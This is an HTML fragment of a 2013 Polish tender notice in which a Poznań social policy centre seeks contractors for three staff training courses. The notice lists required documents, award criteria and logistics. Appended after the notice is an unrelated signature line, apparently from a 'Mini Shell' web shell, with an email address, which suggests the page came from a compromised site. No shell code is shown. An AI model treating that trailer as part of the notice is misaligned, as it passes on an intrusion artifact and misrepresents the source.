<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy (formularz ofertowy-Załącznik Nr 2.1. do SIWZ dla Części 1, Załącznik Nr 2.2. do SIWZ dla Części 2, Załącznik Nr 2.3. do SIWZ dla Części 3).
Pełnomocnictwo do reprezentowania Wykonawcy, w przypadku podpisania oferty przez przedstawiciela Wykonawcy (w formie oryginału lub poświadczonej notarialnie kopii).
Dowody: poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert. 
W przypadku zamówień na usługi -oświadczenie wykonawcy -jeżeli z uzasadnionych przyczyn 
o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.

Dowód wniesienia wadium.
Wykaz Doświadczenie w przeprowadzaniu szkoleń i kwalifikacje kadry szkoleniowej
dla potrzeb oceny w ramach kryterium -Załącznik Nr 9.1. do SIWZ dla części Nr 1, Załącznik Nr 9.2. do SIWZ dla części Nr 2, Załącznik Nr 9.3. do SIWZ dla części Nr 3.
Pisemne zobowiązanie innego podmiotu-podmiotów do udostępnienia osoby-osób zdolnych do wykonania zamówienia lub zasobów niezbędnych do wykonania zamówienia, którymi Wykonawca będzie dysponował, lub inny dowód potwierdzający dysponowanie ww osobami-zasobami</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zawarte są we wzorach umowy tj.: w Załączniku Nr 5.1. do SIWZ dla Części 1, Załączniku Nr 5.2. do SIWZ dla Części 2, Załączniku Nr 5.3. do SIWZ dla Części 3.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rops.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalny Ośrodek Polityki Społecznej w Poznaniu, ul. Nowowiejskiego 11, 61-731 Poznań pok. 320.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2013 godzina 09:00, miejsce: Regionalny Ośrodek Polityki Społecznej w Poznaniu, ul. Nowowiejskiego 11, 61-731 Poznań pok. 208 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> świadczenie usług szkoleniowych w ramach projektu systemowego 
pn. Podnoszenie kwalifikacji kadr pomocy i integracji społecznej w Wielkopolsce,
Działanie 7.1.3. Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Praca z dzieckiem z FAS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cel szkolenia: Celem szkolenia jest wyposażenie uczestników w kompetencje niezbędne do świadczenia skutecznej pomocy dzieciom i młodzieży z zespołem FAS (Płodowy Zespół Alkoholowy) w przezwyciężaniu trudności w ich funkcjonowaniu społecznym. 

Zakres tematyczny:
I.	Wprowadzenie:
	Zarys rozwoju kompetencji psychospołecznych dziecka.

II.	Dziecko z zespołem FAS (Płodowy Zespół Alkoholowy):
1.	diagnoza dziecka z FAS - metody rozpoznawania FAS i ich praktyczne zastosowanie,
2.	portret dziecka z zespołem FAS,
3.	różnice pomiędzy zespołem FAS a ADHD,
4.	zaburzenia fizjologiczne, charakterystyczne dla dziecka z zespołem FAS,
5.	metody pracy z dzieckiem,
6.	profilaktyka zaburzeń wtórnych,
7.	teoretyczne i praktyczne przykłady programów socjoterapeutycznych w pracy z dzieckiem FAS.
III.	Wspieranie pracy na rzecz dziecka z zespołem FAS: 
1.	organizacje i instytucje działające na rzecz dzieci z FAS oraz współpraca z nimi,
2.	analiza zasobów środowiska lokalnego w zakresie pomocy dzieciom z FAS,
3.	rola Asystenta rodziny.

Sposób organizacji szkolenia: Wykonawcy ubiegający się o realizację niniejszego zamówienia zobowiązują się zorganizować i przeprowadzić nie więcej niż 7 edycji trzydniowych, 21-godzinnych szkoleń (przy założeniu, że jedna godzina zajęć dydaktycznych to 45 minut), dla 120 uczestników w podziale na grupy maksymalnie 20 osobowe wraz 
z zapewnieniem uczestnikom poszczególnych edycji dowozu, zakwaterowania oraz wyżywienia. 

Materiały szkoleniowe: Wykonawca zobowiązany jest zapewnić każdemu uczestnikowi materiały szkoleniowe wraz ze szczegółowym harmonogramem zajęć, w formie papierowej i na nośniku elektronicznym. Materiały szkoleniowe zostaną przekazane Zamawiającemu do akceptacji nie później niż 5 dni przed podpisaniem umowy. 

Rekrutacja i obsługa administracyjna: Współpraca z Zamawiającym w zakresie naboru kandydatów na szkolenie i tworzenie listy uczestników oznacza:
-	nawiązanie kontaktu Wykonawcy z jednostkami pomocy i integracji społecznej w Wielkopolsce i na podstawie otrzymanych tą drogą zgłoszeń przeprowadzenie wstępnej kwalifikacji uczestników szkolenia oraz sporządzenie listy kandydatów na każdą edycję, 
-	przekazanie sporządzonej listy kandydatów Zamawiającemu w celu uzyskania jej akceptacji. Dostarczenie ww. listy musi nastąpić na 2 dni przed terminem rozpoczęcia każdej edycji szkolenia, 
-	poinformowanie kandydatów; po otrzymaniu od Zamawiającego akceptacji zgłoszonych uczestników, 
o zakwalifikowaniu się na szkolenie. 
Wykonawca dokonuje ww. czynności posługując się formularzami przygotowanymi przez Zamawiającego 
i z wykorzystaniem danych kontaktowych udostępnionych przez Zamawiającego (baza e-mail jednostek pomocy 
i integracji społecznej w Wielkopolsce).
Zamawiający prowadzi działania wspierające działania Wykonawcy w formie ogłoszeń, listów oraz informacji na stronie internetowej. Mają one na celu promowanie szkolenia i informowanie o szkoleniu jednostek pomocy społecznej w Wielkopolsce.

Organizacja szkolenia
Dojazd: Wykonawca jest zobowiązany zorganizować dojazd uczestników na każdą edycję:
- pierwszego dnia każdej edycji z miejsca zbiórki uczestników do miejsca, w którym realizowane będzie szkolenie oraz 
-  po zakończeniu edycji powrót do miejsca zbiórki. 
Zakwaterowanie: Wykonawca jest zobowiązany zapewnić zakwaterowanie uczestników szkolenia w pokojach 2 lub 1 osobowych, w hotelu trzygwiazdkowym lub ośrodku rekreacyjno - szkoleniowym spełniającym standard hotelu trzygwiazdkowego, położonym w woj. wielkopolskim, w tym w mieście Poznaniu. 
Sale szkoleniowe: Wykonawca powinien zapewnić uczestnikom szkolenia warunki do nauki w oparciu o zasady BHP. 
Wyżywienie: Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia, 
a dostarczane posiłki powinny zapewniać 100% całodziennego zapotrzebowania na energię i składniki odżywcze.
Wykonawca zobowiązany jest zapewnić uczestnikom podczas szkolenia: 
- pierwszego dnia - obiad dwudaniowy z napojem oraz kolację integracyjną,
- drugiego dnia - śniadanie, obiad dwudaniowy z napojem, kolację,
- trzeciego dnia - śniadanie, obiad dwudaniowy z napojem,
- 2 serwisy konferencyjne w każdym dniu szkolenia.

Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku Nr 1.1. do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.11.00.00-4, 55.12.00.00-7, 55.30.00.00-3, 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doświadczenie zawodowe w pracy z dziećmi z zaburzeniami wynikającymi z FAS - 30</li>
<li>3. - Doświadczenie w prowadzeniu szkoleń dotyczących zaburzeń zachowania dzieci wynikających z FAS (zdobyte w okresie ostatnich 5 lat) - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Kodeks postępowania administracyjnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cel szkolenia: Celem szkolenia jest teoretyczne i praktyczne przygotowanie uczestników do stosowania procedur administracyjnych w instytucjach pomocy i integracji społecznej.

Zakres tematyczny:
a) Kodeks postępowania administracyjnego a ustawa  o pomocy społecznej;
b) zasady postępowania administracyjnego;
c) właściwość rzeczowa i miejscowa organu;
d) strona w postępowaniu, przedstawiciel ustawowy, pełnomocnik;
e) doręczenia pism przez organ, doręczanie pism pełnomocnikom; doręczenia szczególne i zastępcze;
f) rozstrzygnięcia w postępowaniu administracyjnym;
g) stwierdzenie nieważności decyzji administracyjnej i wznowienie postępowania;
h) dokumenty i inne dowody;
i) podjęcie, zawieszenie, umorzenie, zakończenie postępowania;
j) praktyczne rozwiązywanie zagadnień zgłoszonych przez uczestników szkolenia.

Sposób organizacji szkolenia: Wykonawcy ubiegający się o realizację niniejszego zamówienia zobowiązują się zorganizować i przeprowadzić nie więcej niż 7 dwudniowych edycji szkoleń w wymiarze 15 godzin dydaktycznych dla każdej grupy (przy założeniu, że jedna godzina zajęć dydaktycznych to 45 minut), dla 120 osób, w podziale na grupy liczące maksymalnie 20 osób, wraz z zapewnieniem uczestnikom poszczególnych edycji dowozu, zakwaterowania oraz wyżywienia.
Materiały szkoleniowe: Wykonawca zobowiązany jest zapewnić każdemu uczestnikowi materiały szkoleniowe w tym obowiązujący Kodeks postępowania administracyjnego wraz ze szczegółowym harmonogramem zajęć, w formie papierowej i na nośniku elektronicznym. Materiały szkoleniowe zostaną przekazane Zamawiającemu do akceptacji nie później niż 5 dni przed podpisaniem umowy. 

Rekrutacja i obsługa administracyjna: Współpraca z Zamawiającym w zakresie naboru kandydatów 
na szkolenie i tworzenie listy uczestników oznacza:
-	nawiązanie kontaktu Wykonawcy z jednostkami pomocy i integracji społecznej w Wielkopolsce 
i na podstawie otrzymanych tą drogą zgłoszeń przeprowadzenie wstępnej kwalifikacji uczestników szkolenia oraz sporządzenie listy kandydatów do grupy, 
-	przekazanie sporządzonej listy kandydatów Zamawiającemu w celu uzyskania jej akceptacji. Dostarczenie ww. listy musi nastąpić na 2 dni przed terminem rozpoczęcia każdej edycji, 

-	poinformowanie kandydatów, po otrzymaniu od Zamawiającego akceptacji zgłoszonych uczestników, 
o zakwalifikowaniu się na szkolenie. 

Wykonawca dokonuje ww. czynności posługując się formularzami przygotowanymi przez Zamawiającego 
i z wykorzystaniem danych kontaktowych udostępnionych przez Zamawiającego (baza e-mail jednostek pomocy i integracji społecznej w Wielkopolsce).
Zamawiający prowadzi działania wspierające działania Wykonawcy w formie ogłoszeń, listów oraz informacji na stronie internetowej. Mają one na celu promowanie szkolenia i informowanie o szkoleniu jednostek pomocy społecznej w Wielkopolsce.

Organizacja szkolenia
Dojazd: Wykonawca jest zobowiązany zorganizować dojazd uczestników na każdą edycję:
- pierwszego dnia każdej edycji z miejsca zbiórki uczestników szkolenia do miejsca, w którym realizowane będzie szkolenie oraz 
-  po zakończeniu każdej edycji powrót do miejsca zbiórki. 
Zakwaterowanie: Wykonawca jest zobowiązany zapewnić zakwaterowanie uczestników szkolenia w pokojach 2 lub 1 osobowych, w hotelu trzygwiazdkowym lub ośrodku rekreacyjno - szkoleniowym spełniającym standard hotelu trzygwiazdkowego, położonym w woj. wielkopolskim, w tym w mieście Poznaniu.
Sale szkoleniowe: Wykonawca powinien zapewnić uczestnikom szkolenia warunki do nauki w oparciu 
o zasady BHP. 
Wyżywienie: Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia, 
a dostarczane posiłki powinny zapewniać 100% całodziennego zapotrzebowania na energię i składniki odżywcze.
Wykonawca zobowiązany jest zapewnić uczestnikom podczas szkolenia: 
- pierwszego dnia - obiad dwudaniowy z napojem oraz kolację,
- drugiego dnia - śniadanie, obiad dwudaniowy z napojem,
- 2 serwisy konferencyjne w każdym dniu szkolenia, 
- zorganizowanie kolacji integracyjnej podczas pierwszego dnia szkolenia.

Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku Nr 1.2. do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.11.00.00-4, 55.12.00.00-7, 55.30.00.00-3, 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doświadczenie szkoleniowe: przeprowadzone minimum 300 godzin lekcyjnych szkolenia   z zakresu  Kodeksu postępowania administracyjnego - 20</li>
<li>3. udokumentowane doświadczenie zawodowe w pracy w administracji publicznej w zakresie pomocy społecznej - 20</li>
<li>4. udokumentowane doświadczenie zawodowe w Samorządowym Kolegium Odwoławczym - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Stres i wypalenie zawodowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cel szkolenia: Celem szkolenia jest nabycie praktycznych umiejętności rozpoznawania objawów nadmiernego stresu, poznanie technik radzenia sobie ze stresem oraz zasad dbania o równowagę psychofizjologiczną w warunkach przepracowania.
Zakres tematyczny:
a) Stres jako czynnik zaburzający równowagę psychofizyczną.
-fizjologia czasu - rytmy dobowe, kwartalne, roczne oraz ich wpływ na sprawność psychofizyczną i możliwości intelektualne człowieka,
-autodiagnoza własnego stanu: zmęczenie, przemęczenie, stres, wypalenie zawodowe,
- stresopochodne procesy psychologiczne i fizjologiczne,
- etapy reakcji stresowej,
-stres eufunkcjonalny i dysfunkcjonalny - poziom stresu a skuteczność funkcjonowania,
- stres doraźny a stres przewlekły,
- zarządzanie własną energią i jej regeneracja.
b) Rozwijanie w sobie odporności na stres
- fizjologiczna odporność- dieta, kondycja fizyczna,
- psychologiczna odporność - zbalansowany styl życia, asertywny styl bycia.
c) Techniki kontroli stresu i rozładowujące napięcie
-zmiany w systemie przekonań i nastawieniu do świata,
- zarządzanie czasem - redukcja stresu poprzez zwiększenie efektywności pracy,
- sztuka odpoczynku - nauka metod relaksacji,
- fizyczna redukcja stresu i głębokie oddychanie, kontrola napięcia mięsni,
- przegląd metod (np. technika relaksacji Jacobsona i trening autogenny Schultza),
- metody konstruktywnego reagowania na sytuacje stresowe,
- samo-hipnoza i autosugestia - fakty i mity.

Sposób organizacji szkolenia: Wykonawcy ubiegający się o realizację niniejszego zamówienia zobowiązują się zorganizować i przeprowadzić nie więcej niż 11 edycji trzydniowych, 21-godzinnych szkoleń (przy założeniu, że jedna godzina zajęć dydaktycznych to 45 minut), dla 200 uczestników w podziale na grupy maksymalnie 20 osobowe wraz 
z zapewnieniem uczestnikom poszczególnych edycji dowozu, zakwaterowania oraz wyżywienia. 
Materiały szkoleniowe: Wykonawca zobowiązany jest zapewnić każdemu uczestnikowi materiały szkoleniowe wraz ze szczegółowym harmonogramem zajęć, w formie papierowej i na nośniku elektronicznym. Materiały szkoleniowe zostaną przekazane Zamawiającemu do akceptacji nie później niż 5 dni przed podpisaniem umowy. 

Rekrutacja i obsługa administracyjna: Współpraca z Zamawiającym w zakresie naboru kandydatów na szkolenie i tworzenie listy uczestników oznacza:
-nawiązanie kontaktu Wykonawcy z jednostkami pomocy i integracji społecznej w Wielkopolsce i na podstawie otrzymanych tą drogą zgłoszeń przeprowadzenie wstępnej kwalifikacji uczestników szkolenia oraz sporządzenie listy kandydatów do grupy, 
-przekazanie sporządzonej listy kandydatów Zamawiającemu w celu uzyskania jej akceptacji. Dostarczenie ww. listy musi nastąpić na 2 dni przed terminem rozpoczęcia pierwszej edycji, 
-poinformowanie kandydatów, po otrzymaniu od Zamawiającego akceptacji zgłoszonych uczestników, 
o zakwalifikowaniu się na szkolenie. 
Wykonawca dokonuje ww. czynności posługując się formularzami przygotowanymi przez Zamawiającego 
i z wykorzystaniem danych kontaktowych udostępnionych przez Zamawiającego (baza e-mail jednostek pomocy i integracji społecznej w Wielkopolsce).
Zamawiający prowadzi działania wspierające działania Wykonawcy w formie ogłoszeń, listów oraz informacji na stronie internetowej. Mają one na celu promowanie szkolenia i informowanie o szkoleniu jednostek pomocy społecznej w Wielkopolsce

Organizacja szkolenia
Dojazd: Wykonawca jest zobowiązany zapewnić zorganizowanie dojazdu uczestników na każda edycję:
-pierwszego dnia z miejsca zbiórki uczestników szkolenia do miejsca w którym realizowane będzie szkolenie oraz 
-po zakończeniu szkolenia powrót do miejsca zbiórki. 

Zakwaterowanie: Wykonawca jest zobowiązany zapewnić zakwaterowanie uczestników zjazdów w pokojach 2 lub 1 osobowych, w hotelu trzygwiazdkowym lub ośrodku rekreacyjno - szkoleniowym spełniającym standard hotelu trzygwiazdkowego, położonym w woj. wielkopolskim, w tym w mieście Poznaniu. 
Sale szkoleniowe: Wykonawca powinien zapewnić uczestnikom szkolenia warunki do nauki w oparciu o zasady BHP. 

Wyżywienie: Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia, 
a dostarczane posiłki powinny zapewniać 100% całodziennego zapotrzebowania na energię i składniki odżywcze.
Wykonawca zobowiązany jest zapewnić uczestnikom podczas szkolenia: 
-pierwszego dnia - obiad dwudaniowy z napojem oraz kolację,
- drugiego dnia - śniadanie, obiad dwudaniowy z napojem, kolacja,
- trzeciego dnia - śniadanie, obiad dwudaniowy z napojem,
- 2 serwisy konferencyjne w każdym dniu szkolenia, składające się z kawy, herbaty, wody mineralnej, soków, owoców; np. jabłko lub banan, wyrobów cukierniczych,
-zorganizowanie kolacji integracyjnej pierwszego dnia szkolenia

Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku Nr 1.3. do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.11.00.00-4, 55.12.00.00-7, 55.30.00.00-3, 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doświadczenie zawodowe w pracy psychoterapeutycznej: liczba lat pracy minimum 2 lata - 20</li>
<li>3. Doświadczenie szkoleniowe z zakresu zarządzania stresem i przeciwdziałania wypaleniu zawodowemu - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com